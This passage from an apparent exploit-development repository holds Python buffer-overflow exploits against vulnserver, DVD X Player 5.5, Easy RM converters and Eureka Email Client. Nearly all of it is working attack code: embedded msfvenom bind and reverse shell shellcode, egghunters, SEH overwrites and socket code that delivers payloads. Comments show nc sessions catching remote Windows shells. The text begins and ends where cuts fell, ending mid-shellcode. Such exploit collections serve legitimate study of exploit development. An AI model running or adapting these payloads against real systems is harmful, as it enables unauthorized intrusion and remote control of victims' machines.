101 | egghunter2 += "\x2A\x2D\x52\x32\x32\x32\x2D\x31\x31\x31\x31\x2D\x6E\x5A\x4A\x32" 102 | egghunter2 += "\x41\x41\x41\x41\x71\x06\x70\x04" # JMP FRONT 103 | 104 | # Third stage encoded egghunter 105 | # Payload Size: 120 Bytes 106 | egghunter3 = "\x50\x41\x41\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x31\x2D" 107 | egghunter3 += "\x77\x44\x2D\x31\x2D\x77\x44\x2D\x38\x24\x47\x77\x50\x41\x41\x41" 108 | egghunter3 += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 109 | egghunter3 += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 110 | egghunter3 += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 111 | egghunter3 += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 112 | egghunter3 += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 113 | egghunter3 += "\x41\x41\x41\x41\x71\x06\x70\x04" #JMP FRONT 114 | 115 | jmpback1 = nseh + nops 116 | jmpback2 = nseh + egghunter3 117 | jmpback3 = nseh + egghunter2 118 | 119 | # evil = junk + nSEH + SEH + junk 120 | evil = "A"*1500 + shellcode 121 | evil += "A"*(3495-len(jmpback1)-len(jmpback2)-len(jmpback3)-len(egghunter1)-len(shellcode)-1500) 122 | evil += egghunter1 + jmpback3 + jmpback2 + jmpback1 + nseh + seh 123 | evil += "D"*497 124 | 125 | data = "LTER /.:/" + evil 126 | 127 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 128 | expl.connect(("10.0.0.35", 9999)) 129 | expl.send(data) 130 | expl.close() 131 | -------------------------------------------------------------------------------- /exploit-TRUN.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # November 2017 | github.com/rafaveira3 4 | # 5 | # Exploit vulnserver.exe - TRUN - Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - http://sites.google.com/site/lupingreycorner/vulnserver.zip 11 | # 12 | # 13 | # Development Proccess: 14 | # - 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # - Double Click vulnserver.exe 19 | # 20 | # Kali: 21 | # root@kali:~# python exploit-TRUN.py 22 | # root@kali:~# nc -nv 10.10.0.20 443 23 | # (UNKNOWN) [10.10.0.20] 443 (https) open 24 | # Microsoft Windows XP [Version 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Documents and Settings\rafael\Desktop\WORK\vulnserver> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | import socket 35 | import os 36 | import sys 37 | 38 | # jmp esp found at 0x625011af - essfunc.fll 39 | ret = "\xaf\x11\x50\x62" 40 | 41 | # few nops before shellcode 42 | nops = "\x90"*10 43 | 44 | # msfvenom -p windows/shell_bind_tcp -e x86/shikata_ga_nai -b "\x00" LPORT=443 -f python -v shellcode 45 | # Payload Size: 356 Bytes 46 | shellcode = "" 47 | shellcode += "\xd9\xc7\xbf\x5a\x26\x0a\x71\xd9\x74\x24\xf4\x5a" 48 | shellcode += "\x31\xc9\xb1\x53\x31\x7a\x17\x83\xea\xfc\x03\x20" 49 | shellcode += "\x35\xe8\x84\x28\xd1\x6e\x66\xd0\x22\x0f\xee\x35" 50 | shellcode += "\x13\x0f\x94\x3e\x04\xbf\xde\x12\xa9\x34\xb2\x86" 51 | shellcode += "\x3a\x38\x1b\xa9\x8b\xf7\x7d\x84\x0c\xab\xbe\x87" 52 | shellcode += "\x8e\xb6\x92\x67\xae\x78\xe7\x66\xf7\x65\x0a\x3a" 53 | shellcode += "\xa0\xe2\xb9\xaa\xc5\xbf\x01\x41\x95\x2e\x02\xb6" 54 | shellcode += "\x6e\x50\x23\x69\xe4\x0b\xe3\x88\x29\x20\xaa\x92" 55 | shellcode += "\x2e\x0d\x64\x29\x84\xf9\x77\xfb\xd4\x02\xdb\xc2" 56 | shellcode += "\xd8\xf0\x25\x03\xde\xea\x53\x7d\x1c\x96\x63\xba" 57 | shellcode += "\x5e\x4c\xe1\x58\xf8\x07\x51\x84\xf8\xc4\x04\x4f" 58 | shellcode += "\xf6\xa1\x43\x17\x1b\x37\x87\x2c\x27\xbc\x26\xe2" 59 | shellcode += "\xa1\x86\x0c\x26\xe9\x5d\x2c\x7f\x57\x33\x51\x9f" 60 | shellcode += "\x38\xec\xf7\xd4\xd5\xf9\x85\xb7\xb1\xce\xa7\x47" 61 | shellcode += "\x42\x59\xbf\x34\x70\xc6\x6b\xd2\x38\x8f\xb5\x25" 62 | shellcode += "\x3e\xba\x02\xb9\xc1\x45\x73\x90\x05\x11\x23\x8a" 63 | shellcode += "\xac\x1a\xa8\x4a\x50\xcf\x45\x42\xf7\xa0\x7b\xaf" 64 | shellcode += "\x47\x11\x3c\x1f\x20\x7b\xb3\x40\x50\x84\x19\xe9" 65 | shellcode += "\xf9\x79\xa2\x14\x41\xf4\x44\x7c\xa5\x51\xde\xe8" 66 | shellcode += "\x07\x86\xd7\x8f\x78\xec\x4f\x27\x30\xe6\x48\x48" 67 | shellcode += "\xc1\x2c\xff\xde\x4a\x23\x3b\xff\x4c\x6e\x6b\x68" 68 | shellcode += "\xda\xe4\xfa\xdb\x7a\xf8\xd6\x8b\x1f\x6b\xbd\x4b" 69 | shellcode += "\x69\x90\x6a\x1c\x3e\x66\x63\xc8\xd2\xd1\xdd\xee" 70 | shellcode += "\x2e\x87\x26\xaa\xf4\x74\xa8\x33\x78\xc0\x8e\x23" 71 | shellcode += "\x44\xc9\x8a\x17\x18\x9c\x44\xc1\xde\x76\x27\xbb" 72 | shellcode += "\x88\x25\xe1\x2b\x4c\x06\x32\x2d\x51\x43\xc4\xd1" 73 | shellcode += "\xe0\x3a\x91\xee\xcd\xaa\x15\x97\x33\x4b\xd9\x42" 74 | shellcode += "\xf0\x7b\x90\xce\x51\x14\x7d\x9b\xe3\x79\x7e\x76" 75 | shellcode += "\x27\x84\xfd\x72\xd8\x73\x1d\xf7\xdd\x38\x99\xe4" 76 | shellcode += "\xaf\x51\x4c\x0a\x03\x51\x45" 77 | 78 | evil = "A"*2003 + ret + nops + shellcode + "C"*(993-len(shellcode)-len(nops)) 79 | 80 | data = "TRUN /.:/" + evil 81 | 82 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 83 | expl.connect(("10.10.0.20", 9999)) 84 | expl.send(data) 85 | expl.close() 86 | -------------------------------------------------------------------------------- /exploit-dvdxplayer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # July 2017 | github.com/rafaveira3 4 | # 5 | # Exploit DVD X Player 5.5 - Playlist .sfl Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2 (Metasploitable will do) and Kali. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - http://www.exploit-db.com/wp-content/themes/exploit/applications/cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe 11 | # - pattern_create.rb and pattern_offset.rb = 260 12 | # - Bachars = \x00\x0a\x0d\x1a 13 | # - Return Address found at 0x616525cb (JMP ESP) | EPG.dll 14 | # - Generated the payload using msfvenom 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # C:\Python27>python.exe exploit-dvdxplayer.py 19 | # C:\Python27> 20 | # - Open DVD X Player 5.5, click on "Later", "Open Playlist...", and select C:\Python27\exploit.plf 21 | # Kali: 22 | # root@kali:~# nc -nlvp 443 23 | # listening on [any] 443 ... 24 | # connect to [10.0.0.36] from (UNKNOWN) [10.0.0.44] 1047 25 | # Microsoft Windows XP [vers�o 5.1.2600] 26 | # (C) Copyright 1985-2001 Microsoft Corp. 27 | # 28 | # C:\Python27> 29 | # 30 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 31 | # Accessing a computer system or network without authorization or explicit permission is illegal. 32 | # 33 | # 34 | 35 | eip = "\xcb\x25\x65\x61" 36 | nops = "\x90"*100 37 | filename = "exploit.plf" 38 | 39 | # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.0.36 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a" 40 | #Payload size: 351 bytes 41 | 42 | shellcode = ("\xbd\xb1\xd0\x2c\xb6\xd9\xc2\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 43 | "\x52\x31\x6a\x12\x83\xc2\x04\x03\xdb\xde\xce\x43\xe7\x37\x8c" 44 | "\xac\x17\xc8\xf1\x25\xf2\xf9\x31\x51\x77\xa9\x81\x11\xd5\x46" 45 | "\x69\x77\xcd\xdd\x1f\x50\xe2\x56\x95\x86\xcd\x67\x86\xfb\x4c" 46 | "\xe4\xd5\x2f\xae\xd5\x15\x22\xaf\x12\x4b\xcf\xfd\xcb\x07\x62" 47 | "\x11\x7f\x5d\xbf\x9a\x33\x73\xc7\x7f\x83\x72\xe6\x2e\x9f\x2c" 48 | "\x28\xd1\x4c\x45\x61\xc9\x91\x60\x3b\x62\x61\x1e\xba\xa2\xbb" 49 | "\xdf\x11\x8b\x73\x12\x6b\xcc\xb4\xcd\x1e\x24\xc7\x70\x19\xf3" 50 | "\xb5\xae\xac\xe7\x1e\x24\x16\xc3\x9f\xe9\xc1\x80\xac\x46\x85" 51 | "\xce\xb0\x59\x4a\x65\xcc\xd2\x6d\xa9\x44\xa0\x49\x6d\x0c\x72" 52 | "\xf3\x34\xe8\xd5\x0c\x26\x53\x89\xa8\x2d\x7e\xde\xc0\x6c\x17" 53 | "\x13\xe9\x8e\xe7\x3b\x7a\xfd\xd5\xe4\xd0\x69\x56\x6c\xff\x6e" 54 | "\x99\x47\x47\xe0\x64\x68\xb8\x29\xa3\x3c\xe8\x41\x02\x3d\x63" 55 | "\x91\xab\xe8\x24\xc1\x03\x43\x85\xb1\xe3\x33\x6d\xdb\xeb\x6c" 56 | "\x8d\xe4\x21\x05\x24\x1f\xa2\x20\xb9\x1f\x16\x5d\xbb\x1f\x57" 57 | "\x26\x32\xf9\x3d\x48\x13\x52\xaa\xf1\x3e\x28\x4b\xfd\x94\x55" 58 | "\x4b\x75\x1b\xaa\x02\x7e\x56\xb8\xf3\x8e\x2d\xe2\x52\x90\x9b" 59 | "\x8a\x39\x03\x40\x4a\x37\x38\xdf\x1d\x10\x8e\x16\xcb\x8c\xa9" 60 | "\x80\xe9\x4c\x2f\xea\xa9\x8a\x8c\xf5\x30\x5e\xa8\xd1\x22\xa6" 61 | "\x31\x5e\x16\x76\x64\x08\xc0\x30\xde\xfa\xba\xea\x8d\x54\x2a" 62 | "\x6a\xfe\x66\x2c\x73\x2b\x11\xd0\xc2\x82\x64\xef\xeb\x42\x61" 63 | "\x88\x11\xf3\x8e\x43\x92\x03\xc5\xc9\xb3\x8b\x80\x98\x81\xd1" 64 | "\x32\x77\xc5\xef\xb0\x7d\xb6\x0b\xa8\xf4\xb3\x50\x6e\xe5\xc9" 65 | "\xc9\x1b\x09\x7d\xe9\x09") 66 | 67 | buffer = "A"*260 + eip + nops + shellcode + "C"*(2000-260-4-100-351) 68 | 69 | textfile = open(filename, 'w') 70 | textfile.write(buffer) 71 | textfile.close() 72 | -------------------------------------------------------------------------------- /exploit-easy.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH) (Using egghunter) 6 | # 7 | # How I tested it: 8 | # - Windows XP SP3 and Kali. 9 | # - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - https://www.exploit-db.com/apps/8074acabe998c5a7af650019c61dd80b-easy_rm_to_dvd.exe 11 | # 12 | # Development Proccess: 13 | # - https://medium.com/@rafaveira3/exploit-development-easy-rm-rmvb-to-dvd-burner-1-8-11-seh-overflow-example-1-4b5ac6de5adc 14 | # 15 | # PoC: 16 | # Windows XP: 17 | # - Install Easy RM RMVB to DVD Burner 1.8.11 (next -> next -> finish) 18 | # C:\Python27\python.exe exploit-easy.py 19 | # - Open exploit.txt on a text editor and Ctrl + C its content 20 | # - Open Easy RM RMVB to DVD Burner 1.8.11 and click Register 21 | # - In "Enter User Name:" Ctrl + V and press OK 22 | # - Open cmd.exe and type : netstat -ano | find ":4444" 23 | # Kali: 24 | # root@kali:~# nc -nv 10.10.0.20 4444 25 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 26 | # Microsoft Windows XP [Version 5.1.2600] 27 | # (C) Copyright 1985-2001 Microsoft Corp. 28 | # 29 | # C:\Program Files\Easy RM RMVB to DVD Burner> 30 | # 31 | # 32 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 33 | # Accessing a computer system or network without authorization or explicit permission is illegal. 34 | # 35 | # Infos: 36 | # - pattern_create + pattern_offset = 1000 37 | # - pop pop ret found usgin mona at 0x10037859 of SkinMagic.dll (SafeSEH: False) 38 | # - jmp back 128 bytes = \xEB\x80 39 | # - egghunter generated with mona (egg r4f4) 40 | # - shellcode generated with msfvenom 41 | 42 | # Size 32 Bytes 43 | # Egg = r4f4 44 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 45 | 46 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 47 | # Size = 718 bytes 48 | shellcode = "" 49 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 50 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 51 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 52 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 53 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 54 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 55 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 56 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 57 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 58 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 59 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 60 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 61 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 62 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 63 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 64 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 65 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 66 | shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 67 | shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 68 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 69 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 70 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 71 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 72 | shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a" 73 | shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c" 74 | shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33" 75 | shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36" 76 | shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66" 77 | shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63" 78 | shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38" 79 | shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73" 80 | shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70" 81 | shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49" 82 | shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52" 83 | shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36" 84 | shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77" 85 | shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a" 86 | shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78" 87 | shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43" 88 | shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31" 89 | shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53" 90 | shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71" 91 | shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69" 92 | shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51" 93 | shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35" 94 | shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36" 95 | shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42" 96 | shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f" 97 | shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39" 98 | shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30" 99 | shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31" 100 | shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f" 101 | shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b" 102 | shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53" 103 | shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39" 104 | shellcode += "\x45\x41\x41" 105 | 106 | buffer = "A" * 764 + "\x90" *150 + egghunter + "\x90"*50 + "B" * 2 + "\xEB\x80" + "\x59\x78\x03\x10" + "r4f4r4f4" + shellcode 107 | 108 | 109 | data = buffer 110 | 111 | f = open("exploit.txt", "w") 112 | f.write(data) 113 | f.close() 114 | -------------------------------------------------------------------------------- /exploit-easyrmtomp3converter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # July 2017 | github.com/rafaveira3 4 | # 5 | # Easy RM to MP3 Converter Exploit - Local Buffer Overflow 6 | # 7 | # How I tested it: 8 | # - Windows XP SP2 (Metasploitable will do) and Kali. 9 | # - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - http://www.exploit-db.com/wp-content/themes/exploit/applications/cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe 11 | # - pattern_create.rb and pattern_offset.rb = 26100 12 | # - Bachars = \x00\x09\x0a 13 | # - Return Address found at 0x7c941eed (JMP ESP) | C:\Arquivos de programas\Easy RM to MP3 Converter\MSRMfilter03.dll 14 | # - Generated the payload using msfvenom 15 | # 16 | # PoC: 17 | # Windows XP: 18 | # C:\Python27>python.exe exploit-easyrmtomp3converter.py 19 | # C:\Python27> 20 | # - Easy RM to MP3 Converter, click on "Load", and select C:\Python27\evil.m3u 21 | # Kali: 22 | # root@kali:~# nc -nlvp 443 23 | # listening on [any] 443 ...connect to [10.0.0.36] from (UNKNOWN) [10.0.0.45] 1083 24 | # Microsoft Windows XP [versao 5.1.2600] 25 | # (C) Copyright 1985-2001 Microsoft Corp. 26 | # 27 | # C:\Arquivos de programas\Easy RM to MP3 Converter> 28 | # 29 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 30 | # Accessing a computer system or network without authorization or explicit permission is illegal. 31 | # 32 | # 33 | 34 | filename = "evil.m3u" 35 | eip = "\xed\x1e\x94\x7c" 36 | nops = "\x90"*100 37 | 38 | # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.0.36 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x09\x0a" 39 | # Payload size: 351 bytes 40 | 41 | shellcode = ("\xba\x9b\x9c\xbb\x42\xd9\xf6\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" 42 | "\x52\x83\xee\xfc\x31\x56\x0e\x03\xcd\x92\x59\xb7\x0d\x42\x1f" 43 | "\x38\xed\x93\x40\xb0\x08\xa2\x40\xa6\x59\x95\x70\xac\x0f\x1a" 44 | "\xfa\xe0\xbb\xa9\x8e\x2c\xcc\x1a\x24\x0b\xe3\x9b\x15\x6f\x62" 45 | "\x18\x64\xbc\x44\x21\xa7\xb1\x85\x66\xda\x38\xd7\x3f\x90\xef" 46 | "\xc7\x34\xec\x33\x6c\x06\xe0\x33\x91\xdf\x03\x15\x04\x6b\x5a" 47 | "\xb5\xa7\xb8\xd6\xfc\xbf\xdd\xd3\xb7\x34\x15\xaf\x49\x9c\x67" 48 | "\x50\xe5\xe1\x47\xa3\xf7\x26\x6f\x5c\x82\x5e\x93\xe1\x95\xa5" 49 | "\xe9\x3d\x13\x3d\x49\xb5\x83\x99\x6b\x1a\x55\x6a\x67\xd7\x11" 50 | "\x34\x64\xe6\xf6\x4f\x90\x63\xf9\x9f\x10\x37\xde\x3b\x78\xe3" 51 | "\x7f\x1a\x24\x42\x7f\x7c\x87\x3b\x25\xf7\x2a\x2f\x54\x5a\x23" 52 | "\x9c\x55\x64\xb3\x8a\xee\x17\x81\x15\x45\xbf\xa9\xde\x43\x38" 53 | "\xcd\xf4\x34\xd6\x30\xf7\x44\xff\xf6\xa3\x14\x97\xdf\xcb\xfe" 54 | "\x67\xdf\x19\x50\x37\x4f\xf2\x11\xe7\x2f\xa2\xf9\xed\xbf\x9d" 55 | "\x1a\x0e\x6a\xb6\xb1\xf5\xfd\xb3\x45\xf5\xd9\xab\x47\xf5\x20" 56 | "\x97\xc1\x13\x48\xf7\x87\x8c\xe5\x6e\x82\x46\x97\x6f\x18\x23" 57 | "\x97\xe4\xaf\xd4\x56\x0d\xc5\xc6\x0f\xfd\x90\xb4\x86\x02\x0f" 58 | "\xd0\x45\x90\xd4\x20\x03\x89\x42\x77\x44\x7f\x9b\x1d\x78\x26" 59 | "\x35\x03\x81\xbe\x7e\x87\x5e\x03\x80\x06\x12\x3f\xa6\x18\xea" 60 | "\xc0\xe2\x4c\xa2\x96\xbc\x3a\x04\x41\x0f\x94\xde\x3e\xd9\x70" 61 | "\xa6\x0c\xda\x06\xa7\x58\xac\xe6\x16\x35\xe9\x19\x96\xd1\xfd" 62 | "\x62\xca\x41\x01\xb9\x4e\x71\x48\xe3\xe7\x1a\x15\x76\xba\x46" 63 | "\xa6\xad\xf9\x7e\x25\x47\x82\x84\x35\x22\x87\xc1\xf1\xdf\xf5" 64 | "\x5a\x94\xdf\xaa\x5b\xbd") 65 | 66 | buffer = "A"*26100 + eip + nops + shellcode + "C"*(30000-26100-4-100) 67 | 68 | textfile = open(filename, 'w') 69 | textfile.write(buffer) 70 | textfile.close 71 | -------------------------------------------------------------------------------- /exploit-eureka.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # October 2017 | github.com/rafaveira3 4 | # 5 | # Exploit Eureka Email Client - Remote Buffer Overflow (Using Egghunter) 6 | # 7 | # How I tested it: 8 | # - Windows XP SP3 and Kali. 9 | # - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE) 10 | # - https://www.exploit-db.com/apps/2b0e55c58e1355c4bd0143d06ce3d239-EurekaEmailSetup.exe 11 | # 12 | # PoC: 13 | # Windows XP: 14 | # - Install Eureka (next -> next -> finish) 15 | # - Setup Eureka to use Kali as a SMTP server 16 | # - Open cmd.exe and type : netstat -ano | find ":4444" 17 | # - Open Eureka and click on File -> Send and receive e-mails 18 | # Kali: 19 | # root@kali:~# python exploit-eureka.py 20 | # [*] Listening on port 110. 21 | # [*] Have someone connect to you. 22 | # [*] Type -c to exit. 23 | # [*] Received connection from: ('10.10.0.20', 1076) 24 | # [*] Done. 25 | # root@kali:~# nc -nv 10.10.0.20 4444 26 | # (UNKNOWN) [10.10.0.20] 4444 (?) open 27 | # Microsoft Windows XP [Version 5.1.2600] 28 | # (C) Copyright 1985-2001 Microsoft Corp. 29 | # 30 | # C:\Program Files\Eureka Email> 31 | # 32 | # 33 | # Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems. 34 | # Accessing a computer system or network without authorization or explicit permission is illegal. 35 | # 36 | # Infos: 37 | # - pattern_create + pattern_offset = 713 38 | # - Return Address found at 0x77fab227 (JMP ESP) | SHLWAPI.dll 39 | # - egghunter generated with mona (egg r4f4) 40 | # - shellcode generated with msfvenom 41 | 42 | import sys 43 | import socket 44 | 45 | 46 | # Size: 32 bytes 47 | # Egg: r4f4 48 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 49 | 50 | # msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed 51 | # Size = 718 bytes 52 | shellcode = "" 53 | shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49" 54 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" 55 | shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" 56 | shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" 57 | shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f" 58 | shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75" 59 | shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e" 60 | shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b" 61 | shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55" 62 | shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42" 63 | shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59" 64 | shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32" 65 | shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52" 66 | shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31" 67 | shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53" 68 | shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54" 69 | shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b" 70 | shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70" 71 | shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51" 72 | shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38" 73 | shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52" 74 | shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b" 75 | shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66" 76 | shellcode += 